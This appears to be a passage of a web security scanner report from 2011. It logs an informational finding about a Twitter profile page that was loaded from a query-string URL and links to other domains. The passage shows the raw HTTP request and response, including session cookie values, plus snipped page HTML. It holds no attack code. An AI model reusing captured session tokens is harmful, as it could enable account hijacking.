Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIklodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwP21h%250AeF9pZD0zMDc5MTc0MDcxNzgwMTQ3MiZwYWdlPTImdHd0dHI9dHJ1ZToMY3Ny%250AZl9pZCIlMTY0MTM2OGY1Njc4ZTgwNmU1ZTgxMGQ3YzZmMGI5YWY6B2lkIiUx%250AYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dac63748d7ecba0fbd9f79424b096b92afb601f2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="alternate" href="http://twitter.com/statuses/user_timeline/14594657.rss" title="malsup's Tweets" type="application/rss+xml" />
...[SNIP]...
<link rel="alternate" href="http://twitter.com/favorites/14594657.rss" title="malsup's Favorites" type="application/rss+xml" />


<link href="http://a2.twimg.com/a/1296179758/stylesheets/twitter.css?1296182306" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a2.twimg.com/a/1296179758/stylesheets/geo.css?1296182306" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a3.twimg.com/a/1296179758/stylesheets/buttons_new.css?1296182306" media="screen" rel="stylesheet" type="text/css" />
<style type="text/css">
...[SNIP]...
</style>
<link href="http://a1.twimg.com/a/1296179758/stylesheets/following.css?1296182306" media="screen, projection" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<span id="loader" style="display:none"><img alt="Loader" src="http://a0.twimg.com/a/1296179758/images/loader.gif" /></span>
...[SNIP]...
<a href="http://twitter.com/" title="Twitter / Home" accesskey="1" id="logo">
<img alt="Twitter.com" src="http://a0.twimg.com/a/1296179758/images/twitter_logo_header.png" />
</a>
...[SNIP]...
<a href="/account/profile_image/malsup?hreflang=en"><img alt="" border="0" height="73" id="profile-image" src="http://a1.twimg.com/profile_images/725487795/michael_bigger.jpg" valign="middle" width="73" /></a>
...[SNIP]...
</a> I think you listed all the relevant props that aren't documented at <a href="http://bit.ly/a90m3b" class="tweet-url web" rel="nofollow" target="_blank">http://bit.ly/a90m3b</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
</a> <a href="http://t.co/7uqdg3u" class="tweet-url web" rel="nofollow" target="_blank">http://t.co/7uqdg3u</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
</a> <a href="http://t.co/djfgFrh" class="tweet-url web" rel="nofollow" target="_blank">http://t.co/djfgFrh</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<a href="/PureADK" class="url" hreflang="en" rel="contact" title="The Adirondacks"><img alt="The Adirondacks" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1179551939/twitter_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/townsandtrails" class="url" hreflang="en" rel="contact" title="Towns and Trails"><img alt="Towns and Trails" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1154599293/townsandtrails_logo_mini.png" width="24" /></a>
...[SNIP]...
<a href="/bennadel" class="url" hreflang="en" rel="contact" title="Ben Nadel"><img alt="Ben Nadel" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/429483912/ben_twitter_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rachbarnhart" class="url" hreflang="en" rel="contact" title="Rachel Barnhart"><img alt="Rachel Barnhart" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1123004358/rachel100_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/sitepointdotcom" class="url" hreflang="en" rel="contact" title="SitePoint"><img alt="SitePoint" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/76953980/Picture_29_mini.png" width="24" /></a>
...[SNIP]...
<a href="/Servigistics" class="url" hreflang="en" rel="contact" title="Servigistics "><img alt="Servigistics " class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1077967086/twitter_swirl_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/travis" class="url" hreflang="en" rel="contact" title="Travis Hardiman"><img alt="Travis Hardiman" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1205752711/madmen_icon_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/waynecountylife" class="url" hreflang="en" rel="contact" title="Wayne County Life"><img alt="Wayne County Life" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/266392931/wcl_logo_v2_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rem" class="url" hreflang="en" rel="contact" title="Remy Sharp"><img alt="Remy Sharp" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/82806383/remysharp_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/scott_gonzalez" class="url" hreflang="en" rel="contact" title="Scott Gonz..lez"><img alt="Scott Gonz..lez" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/156932880/fro_mini.png" width="24" /></a>
...[SNIP]...
<a href="/creationix" class="url" hreflang="en" rel="contact" title="Tim Caswell"><img alt="Tim Caswell" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/774817444/c953ddd239707998340e1a6fbb3eeb46_mini.jpeg" width="24" /></a>
...[SNIP]...
<a href="/ryanolson" class="url" hreflang="en" rel="contact" title="thatryan"><img alt="thatryan" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1196913486/148824_1641117021474_1043276372_1788445_2752216_n_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/webandy" class="url" hreflang="en" rel="contact" title="Andy Atkinson"><img alt="Andy Atkinson" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1100688452/headshot_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/miketaylr" class="url" hreflang="en" rel="contact" title="Mike Taylor"><img alt="Mike Taylor" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1042621997/mikeyyyy_mini.png" width="24" /></a>
...[SNIP]...
<a href="/joemccann" class="url" hreflang="en" rel="contact" title="Joe McCann"><img alt="Joe McCann" class="photo fn" height="24" src="http://a3.twimg.com/profile_images/1053216581/joe-head-with-hat_128x128_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Support" class="url" hreflang="en" rel="contact" title="Support"><img alt="Support" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1164188883/support_mini.png" width="24" /></a>
...[SNIP]...
<a href="/ebello" class="url" hreflang="en" rel="contact" title="Ernie Bello"><img alt="Ernie Bello" class="photo fn" height="24" src="http://a3.twimg.com/profile_images/47266842/me2_mini.JPG" width="24" /></a>
...[SNIP]...
<a href="/TechCrunch" class="url" hreflang="en" rel="contact" title="TechCrunch"><img alt="TechCrunch" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/115466107/techcrunch_bigger_mini.png" width="24" /></a>
...[SNIP]...
<a href="/messengerpost" class="url" hreflang="en" rel="contact" title="messengerpost"><img alt="messengerpost" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/69345786/twitter_icon_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Script_Junkie" class="url" hreflang="en" rel="contact" title="Script Junkie"><img alt="Script Junkie" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/938927592/sjunk_trunc_mini.png" width="24" /></a>
...[SNIP]...
<a href="/stubbornella" class="url" hreflang="en" rel="contact" title="Nicole Sullivan"><img alt="Nicole Sullivan" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/72157651/tattoo_pink_bkg_square_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/danwrong" class="url" hreflang="en" rel="contact" title="Dan Webb"><img alt="Dan Webb" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/692828214/avatar_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/SlexAxton" class="url" hreflang="en" rel="contact" title="Alex Sexton"><img alt="Alex Sexton" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/505590110/1ac219a6360a061d1ab2dbdc93435c96_mini.jpeg" width="24" /></a>
...[SNIP]...
<a href="/davevogler" class="url" hreflang="en" rel="contact" title="Dave Vogler"><img alt="Dave Vogler" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1147359486/dave-vogler-50_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/ExpertDan" class="url" hreflang="en" rel="contact" title="Dan DeFelippi"><img alt="Dan DeFelippi" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1171493203/headshot-11-20-10_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/dandenney" class="url" hreflang="en" rel="contact" title="Dan Denney"><img alt="Dan Denney" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1216037299/dan-social-avatar_mini.png" width="24" /></a>
...[SNIP]...
<a href="/androidnewsblog" class="url" hreflang="en" rel="contact" title="Google Android Blog"><img alt="Google Android Blog" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/349012784/android_logo_small_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/cowboy" class="url" hreflang="en" rel="contact" title="Ben Alman"><img alt="Ben Alman" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/860569124/headshot_kangol_200_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Svantasukhai" class="url" hreflang="en" rel="contact" title="Vivek Dube"><img alt="Vivek Dube" class="photo fn" height="24" src="http://a1.twimg.com/a/1294957282/images/default_profile_2_mini.png" width="24" /></a>
...[SNIP]...
<a href="/ajpiano" class="url" hreflang="en" rel="contact" title="adam j.sontag"><img alt="adam j.sontag" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/530311059/twitpic_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/mennovanslooten" class="url" hreflang="en" rel="contact" title="Menno van Slooten"><img alt="Menno van Slooten" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1121468480/headshot_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rwaldron" class="url" hreflang="en" rel="contact" title="rick waldron"><img alt="rick waldron" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/732025391/rick_jedi_avatar_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/dougneiner" class="url" hreflang="en" rel="contact" title="Douglas Neiner"><img alt="Douglas Neiner" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1219117972/doug-html5-2_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/RobertDuffy" class="url" hreflang="en" rel="contact" title="RobertDuffy"><img alt="RobertDuffy" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/39840022/n647511610_73231_8183_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/gercheq" class="url" hreflang="en" rel="contact" title="Gercek Karakus"><img alt="Gercek Karakus" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/692950475/gercekkarakus_mini.png" width="24" /></a>
...[SNIP]...
<a href="/sentience" class="url" hreflang="en" rel="contact" title="Kevin Yank"><img alt="Kevin Yank" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/275486302/avatar_highres_mini.jpg" width="24" /></a>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

17.256. http://twitter.com/malsup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /malsup?max_id=30791740717801472&page=2&twttr=true HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224735-52029-12720
ETag: "aeaf54f4215cc48cd19c989655f24a99"
Last-Modified: Fri, 28 Jan 2011 14:25:35 GMT
X-Runtime: 0.56131
Content-Type: text/html; charset=utf-8
Content-Length: 49556
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIklodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwP21h%250AeF9pZD0zMDc5MTc0MDcxNzgwMTQ3MiZwYWdlPTImdHd0dHI9dHJ1ZToMY3Ny%250AZl9pZCIlNDM5ZDJhZDU1OTViNDQ5ZTA5MDQ2OTZhYWM5NGEwZTE6B2lkIiUx%250AYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--acdb87a3f02b633f4834e75acc9f4d30780c1b05; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="alternate" href="http://twitter.com/statuses/user_timeline/14594657.rss" title="malsup's Tweets" type="application/rss+xml" />
...[SNIP]...
<link rel="alternate" href="http://twitter.com/favorites/14594657.rss" title="malsup's Favorites" type="application/rss+xml" />


<link href="http://a3.twimg.com/a/1296179758/stylesheets/twitter.css?1296181726" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a0.twimg.com/a/1296179758/stylesheets/geo.css?1296181726" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a0.twimg.com/a/1296179758/stylesheets/buttons_new.css?1296181726" media="screen" rel="stylesheet" type="text/css" />
<style type="text/css">
...[SNIP]...
</style>
<link href="http://a3.twimg.com/a/1296179758/stylesheets/following.css?1296181726" media="screen, projection" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<span id="loader" style="display:none"><img alt="Loader" src="http://a0.twimg.com/a/1296179758/images/loader.gif" /></span>
...[SNIP]...
<a href="http://twitter.com/" title="Twitter / Home" accesskey="1" id="logo">
<img alt="Twitter.com" src="http://a0.twimg.com/a/1296179758/images/twitter_logo_header.png" />
</a>
...[SNIP]...
<a href="/account/profile_image/malsup?hreflang=en"><img alt="" border="0" height="73" id="profile-image" src="http://a1.twimg.com/profile_images/725487795/michael_bigger.jpg" valign="middle" width="73" /></a>
...[SNIP]...
</a> I think you listed all the relevant props that aren't documented at <a href="http://bit.ly/a90m3b" class="tweet-url web" rel="nofollow" target="_blank">http://bit.ly/a90m3b</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
</a> <a href="http://t.co/7uqdg3u" class="tweet-url web" rel="nofollow" target="_blank">http://t.co/7uqdg3u</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
</a> <a href="http://t.co/djfgFrh" class="tweet-url web" rel="nofollow" target="_blank">http://t.co/djfgFrh</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<span>via <a href="http://itunes.apple.com/us/app/twitter/id409789998?mt=12" rel="nofollow">Twitter for Mac</a>
...[SNIP]...
<a href="/PureADK" class="url" hreflang="en" rel="contact" title="The Adirondacks"><img alt="The Adirondacks" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1179551939/twitter_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/townsandtrails" class="url" hreflang="en" rel="contact" title="Towns and Trails"><img alt="Towns and Trails" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1154599293/townsandtrails_logo_mini.png" width="24" /></a>
...[SNIP]...
<a href="/bennadel" class="url" hreflang="en" rel="contact" title="Ben Nadel"><img alt="Ben Nadel" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/429483912/ben_twitter_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rachbarnhart" class="url" hreflang="en" rel="contact" title="Rachel Barnhart"><img alt="Rachel Barnhart" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1123004358/rachel100_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/sitepointdotcom" class="url" hreflang="en" rel="contact" title="SitePoint"><img alt="SitePoint" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/76953980/Picture_29_mini.png" width="24" /></a>
...[SNIP]...
<a href="/Servigistics" class="url" hreflang="en" rel="contact" title="Servigistics "><img alt="Servigistics " class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1077967086/twitter_swirl_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/travis" class="url" hreflang="en" rel="contact" title="Travis Hardiman"><img alt="Travis Hardiman" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1205752711/madmen_icon_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/waynecountylife" class="url" hreflang="en" rel="contact" title="Wayne County Life"><img alt="Wayne County Life" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/266392931/wcl_logo_v2_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rem" class="url" hreflang="en" rel="contact" title="Remy Sharp"><img alt="Remy Sharp" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/82806383/remysharp_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/scott_gonzalez" class="url" hreflang="en" rel="contact" title="Scott Gonz..lez"><img alt="Scott Gonz..lez" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/156932880/fro_mini.png" width="24" /></a>
...[SNIP]...
<a href="/creationix" class="url" hreflang="en" rel="contact" title="Tim Caswell"><img alt="Tim Caswell" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/774817444/c953ddd239707998340e1a6fbb3eeb46_mini.jpeg" width="24" /></a>
...[SNIP]...
<a href="/ryanolson" class="url" hreflang="en" rel="contact" title="thatryan"><img alt="thatryan" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1196913486/148824_1641117021474_1043276372_1788445_2752216_n_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/webandy" class="url" hreflang="en" rel="contact" title="Andy Atkinson"><img alt="Andy Atkinson" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1100688452/headshot_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/miketaylr" class="url" hreflang="en" rel="contact" title="Mike Taylor"><img alt="Mike Taylor" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/1042621997/mikeyyyy_mini.png" width="24" /></a>
...[SNIP]...
<a href="/joemccann" class="url" hreflang="en" rel="contact" title="Joe McCann"><img alt="Joe McCann" class="photo fn" height="24" src="http://a3.twimg.com/profile_images/1053216581/joe-head-with-hat_128x128_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Support" class="url" hreflang="en" rel="contact" title="Support"><img alt="Support" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1164188883/support_mini.png" width="24" /></a>
...[SNIP]...
<a href="/ebello" class="url" hreflang="en" rel="contact" title="Ernie Bello"><img alt="Ernie Bello" class="photo fn" height="24" src="http://a3.twimg.com/profile_images/47266842/me2_mini.JPG" width="24" /></a>
...[SNIP]...
<a href="/TechCrunch" class="url" hreflang="en" rel="contact" title="TechCrunch"><img alt="TechCrunch" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/115466107/techcrunch_bigger_mini.png" width="24" /></a>
...[SNIP]...
<a href="/messengerpost" class="url" hreflang="en" rel="contact" title="messengerpost"><img alt="messengerpost" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/69345786/twitter_icon_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Script_Junkie" class="url" hreflang="en" rel="contact" title="Script Junkie"><img alt="Script Junkie" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/938927592/sjunk_trunc_mini.png" width="24" /></a>
...[SNIP]...
<a href="/stubbornella" class="url" hreflang="en" rel="contact" title="Nicole Sullivan"><img alt="Nicole Sullivan" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/72157651/tattoo_pink_bkg_square_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/danwrong" class="url" hreflang="en" rel="contact" title="Dan Webb"><img alt="Dan Webb" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/692828214/avatar_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/SlexAxton" class="url" hreflang="en" rel="contact" title="Alex Sexton"><img alt="Alex Sexton" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/505590110/1ac219a6360a061d1ab2dbdc93435c96_mini.jpeg" width="24" /></a>
...[SNIP]...
<a href="/davevogler" class="url" hreflang="en" rel="contact" title="Dave Vogler"><img alt="Dave Vogler" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1147359486/dave-vogler-50_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/ExpertDan" class="url" hreflang="en" rel="contact" title="Dan DeFelippi"><img alt="Dan DeFelippi" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1171493203/headshot-11-20-10_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/dandenney" class="url" hreflang="en" rel="contact" title="Dan Denney"><img alt="Dan Denney" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1216037299/dan-social-avatar_mini.png" width="24" /></a>
...[SNIP]...
<a href="/androidnewsblog" class="url" hreflang="en" rel="contact" title="Google Android Blog"><img alt="Google Android Blog" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/349012784/android_logo_small_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/cowboy" class="url" hreflang="en" rel="contact" title="Ben Alman"><img alt="Ben Alman" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/860569124/headshot_kangol_200_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Svantasukhai" class="url" hreflang="en" rel="contact" title="Vivek Dube"><img alt="Vivek Dube" class="photo fn" height="24" src="http://a1.twimg.com/a/1294957282/images/default_profile_2_mini.png" width="24" /></a>
...[SNIP]...
<a href="/ajpiano" class="url" hreflang="en" rel="contact" title="adam j.sontag"><img alt="adam j.sontag" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/530311059/twitpic_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/mennovanslooten" class="url" hreflang="en" rel="contact" title="Menno van Slooten"><img alt="Menno van Slooten" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1121468480/headshot_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rwaldron" class="url" hreflang="en" rel="contact" title="rick waldron"><img alt="rick waldron" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/732025391/rick_jedi_avatar_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/dougneiner" class="url" hreflang="en" rel="contact" title="Douglas Neiner"><img alt="Douglas Neiner" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1219117972/doug-html5-2_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/RobertDuffy" class="url" hreflang="en" rel="contact" title="RobertDuffy"><img alt="RobertDuffy" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/39840022/n647511610_73231_8183_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/gercheq" class="url" hreflang="en" rel="contact" title="Gercek Karakus"><img alt="Gercek Karakus" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/692950475/gercekkarakus_mini.png" width="24" /></a>
...[SNIP]...
